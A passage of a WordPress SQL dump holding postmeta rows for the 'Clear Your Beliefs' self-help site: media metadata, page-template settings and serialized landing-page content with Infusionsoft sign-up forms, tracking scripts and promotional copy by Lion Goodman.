(899, 1371, '_wp_attachment_metadata', 'a:21:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:56000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR56";s:17:"compression_ratio";d:0.079365079365079361;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:902769;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:129;s:16:"length_formatted";s:4:"2:09";s:5:"title";s:18:"bcp_createfeelings";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:13:"part_of_a_set";s:1:"4";s:4:"year";s:4:"2010";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:13:"iTunes 10.0.1";}'),
(900, 1377, '_wp_attached_file', '2014/08/bcp_secretrevealed1.mp3'),
(901, 1377, '_wp_attachment_metadata', 'a:21:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:96000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:5:"CBR96";s:17:"compression_ratio";d:0.1360544217687075;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:1737255;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:145;s:16:"length_formatted";s:4:"2:25";s:5:"title";s:18:"bcp_secretrevealed";s:6:"artist";s:12:"Lion Goodman";s:5:"album";s:21:"Belief Closet Process";s:4:"year";s:4:"2010";s:5:"genre";s:9:"Self-help";s:7:"comment";s:3:"0\0\0";s:10:"encoded_by";s:10:"iTunes 9.2";}'),
(902, 1395, '_wp_attached_file', '2014/07/1-Clear-Your-Beliefs-01-10-min-clip.mp3'),
(903, 1395, '_wp_attachment_metadata', 'a:15:{s:10:"dataformat";s:3:"mp3";s:8:"channels";i:1;s:11:"sample_rate";i:44100;s:7:"bitrate";i:256000;s:11:"channelmode";s:4:"mono";s:12:"bitrate_mode";s:3:"cbr";s:8:"lossless";b:0;s:15:"encoder_options";s:6:"CBR256";s:17:"compression_ratio";d:0.36281179138321995;s:10:"fileformat";s:3:"mp3";s:8:"filesize";i:24113428;s:9:"mime_type";s:10:"audio/mpeg";s:6:"length";i:754;s:16:"length_formatted";s:5:"12:33";s:4:"year";s:25:"2014-08-16T15:08:02-07:00";}'),
(904, 1401, '_wp_attached_file', '2014/09/Clear-Your-Beliefs-Lion-Goodman.mobi'),
(905, 1402, '_wp_attached_file', '2014/09/Clear-Your-Beliefs-Lion-Goodman.epub'),
(906, 1421, '_edit_lock', '1457751104:2'),
(907, 1421, '_edit_last', '1'),
(908, 1421, '_wp_page_template', 'page-templates/landingpage2.php'),
(909, 1433, '_wp_attached_file', '2014/09/lion.jpg'),
(910, 1433, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1146;s:6:"height";i:1451;s:4:"file";s:16:"2014/09/lion.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"lion-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"lion-236x300.jpg";s:5:"width";i:236;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:17:"lion-808x1024.jpg";s:5:"width";i:808;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:16:"lion-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:16:"lion-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"lion-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:16:"lion-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:17:"lion-1038x576.jpg";s:5:"width";i:1038;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(911, 1445, '_wp_attached_file', '2014/09/logo-globe.jpg'),
(912, 1445, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:202;s:6:"height";i:216;s:4:"file";s:22:"2014/09/logo-globe.jpg";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"logo-globe-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:22:"logo-globe-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(913, 1450, '_edit_lock', '1515178727:2'),
(914, 1450, '_edit_last', '2'),
(915, 1450, '_wp_page_template', 'page-templates/full-width.php'),
(924, 1450, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1649:"[su_box title="The App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99!</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:561:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://www.clearbeliefs.com" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1387, 1828, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1855:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1222:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><br><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
